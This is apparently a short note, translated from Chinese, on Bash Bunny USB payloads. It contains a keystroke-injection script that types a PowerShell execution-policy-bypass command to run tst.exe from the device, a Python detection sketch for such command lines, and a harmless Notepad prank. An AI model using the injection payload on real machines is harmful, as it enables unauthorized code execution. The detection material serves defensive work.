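HID STORAGE mode: the device is recognized as a USB flash drive
The string after Q STRING cannot be very long; if a longer one is needed, declare a string variable and pass that instead.
The following example is written for a Chinese input method.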
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
LED ATTACK
# Run tst.exe from the BashBunny storage volume (drive located by its volume label)
powershell="Powershell -nop -ex Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\tst.exe')"
#RUN WIN Powershell -nop -ex Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\tst.exe')"
Q GUI r
Q DELAY 150
# SHIFT toggles the Chinese IME to English input so the command is typed literally
Q SHIFT
Q DELAY 150
Q STRING $powershell
Q ENTER
LED G 0
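For defenders, the command this payload types into the Run dialog shows up in process-creation logs (Windows Event ID 4688 with command-line auditing, or Sysmon Event ID 1). The Python sketch below is an added example, not part of the original post: the rule names, the severity levels and every sample line except the payload's own string are assumptions constructed for illustration.

```python
import re

def _abbrev(full, min_len):
    # powershell.exe accepts any unambiguous prefix of a parameter name,
    # so match every prefix of `full` that is at least `min_len` long.
    return "(?:" + "|".join(full[:n] for n in range(len(full), min_len - 1, -1)) + ")"

# Hypothetical rule set (names are illustrative, not from any product).
RULES = {
    "no_profile": re.compile(
        r"(?<!\S)[-/]" + _abbrev("noprofile", 3) + r"(?!\S)", re.I),
    "policy_bypass": re.compile(
        r"(?<!\S)[-/](?:ep|" + _abbrev("executionpolicy", 2) + r")\s+bypass(?!\S)", re.I),
    # Drive letter resolved at run time from a volume label, as in the payload above.
    "volume_by_label": re.compile(
        r"\b(?:gwmi|get-wmiobject|get-ciminstance)\s+win32_volume\b.*\blabel\s*=", re.I),
}

def matched_rules(command_line):
    """Return the sorted names of all rules that match one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(command_line))

def severity(command_line):
    """'high' when a policy bypass is combined with a label-resolved volume."""
    hits = set(matched_rules(command_line))
    if {"policy_bypass", "volume_by_label"} <= hits:
        return "high"
    return "low" if hits else "none"

# Constructed sample command lines. The first is the string the payload above
# types; the second spells the same parameters out in full; the last two are
# made-up administrative commands that should not be rated high.
SAMPLES = [
    r"Powershell -nop -ex Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\tst.exe')",
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command .((Get-WmiObject Win32_Volume -Filter 'Label=''BashBunny''').Name+'payloads\switch1\tst.exe')",
    r"powershell.exe -NoProfile -File C:\scripts\backup.ps1",
    r"powershell -Command gwmi win32_volume -f 'DriveType=3'",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(f"{severity(line):5} {matched_rules(line)} {line[:60]}")
```

The label value itself is not part of any rule, because the volume label of the device can be changed; the match is on the lookup-by-label pattern combined with the execution-policy bypass.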
HID mode: the device is recognized as a human interface device
LED B G 100
msg_header="begining"
msg_body="I will learn to lock my computer"
msg_body_repeats=10
msg_end="Please remember to lock your computer when you walk away."
ATTACKMODE HID
Q GUI r
Q DELAY 150
Q STRING notepad.exe
Q ENTER
LED B 500
Q DELAY 200
Q STRING $msg_header
Q ENTER
for (( i=1; i<=$msg_body_repeats; i++ ))
do
    Q STRING $msg_body
    Q ENTER
done
Q STRING $msg_end
Q ENTER
LED G 0